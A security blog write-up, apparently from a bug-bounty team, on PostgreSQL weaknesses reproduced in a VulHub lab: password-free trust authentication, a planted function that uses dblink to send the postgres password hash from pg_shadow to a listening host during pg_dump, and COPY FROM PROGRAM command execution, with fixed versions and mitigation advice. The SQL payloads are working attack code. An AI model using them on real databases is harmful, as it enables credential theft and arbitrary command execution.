No. 1 Introduction to PostgreSQL

PostgreSQL (also known as postgres) is a free object, it’s a relational database server (database management system) distributed under a flexible BSD license. It provides an alternative to other open source database systems, such as MySQL and Firebird, and proprietary systems, such as Oracle, Sybase, IBM’s DB2, and Microsoft SQL Server.

PostgreSQL is as popular as MySQL, and the database of msf is PostgreSQL. However, if the administrator does not configure PostgreSQL correctly, it will cause any user to access PostgreSQL database without a password.

No.2 PostgreSQL Unauthorized Vulnerability

Vulnerability Cause

Cause of PostgreSQL Improper Configuration Vulnerability: As a matter of fact, it is mainly caused by improper administrator configuration. PostgreSQL configuration file is /var/lib/pgsql/9. 2/data/pg_hba. conf. If the administrator does not properly configure the trusted host (as shown in the following figure), any user can access PostgreSQL database without password.

Here is a brief introduction to the following pg_hba. conf configuration file. Excluding the comments, the main effective configuration content is the red circle in the above figure. Explain the meaning of this line:


host    all     all       trust

Host indicates the matching type, the first all indicates any database, the second all indicates the access of any database user, 0.0. 0.0/0 indicates that any IP address accesses this database service, and the last trust indicates password-free login for hosts that meet the conditions.

The above configuration will result in allowing any source IP host, using any database account, and accessing any database without password, which will directly lead to the disclosure of all data in the database.

No.3 PostgreSQL Authorization Vulnerability


Build a vulnerability platform through VulHub and log in to the data platform to obtain the current session user.

Postgres provides the ability to customize functions! We create the following function:

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr= port=7777 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
    SELECT pg_catalog.array_to_string($1,$2);


Then listen to 1**.***.*.**port 7777 on , waiting for the superuser to trigger the “backdoor” we left behind.

Execute the pg_dump command as root:

docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub

Export the contents of the VulHub database.

While executing the above command, the “backdoor” has been triggered, and the password encrypted by the administrator MD5 has been received on the 1**.***.*.** machine:


Vulnerability fixes

The following version fixes this breakthrough:

PostgreSQL PostgreSQL 9.6.8
PostgreSQL PostgreSQL 9.5.12
PostgreSQL PostgreSQL 9.4.17
PostgreSQL PostgreSQL 9.3.22

No.4 PostgreSQL High Privilege Command Execution Vulnerability


Affected Version

PostgreSQL 9.3 to 11.2

In versions 9.3 through 11, there is a “feature” that can be used by administrators or users with “COPY TO/FROM PROGRAM” privileges to execute arbitrary commands.

First connect to postgres and execute POC:


CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'id';

SELECT * FROM cmd_exec;


No.5 Solution Suggestions

The roles of pg_read_server_files, pg_write_server_files, and pg_execute_server_program involve reading and writing database server files, and have relatively large permissions. Careful consideration should be given when assigning the permissions of this role to database users.

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No.7 Author

york@Bounty Team - DBAPPSecurity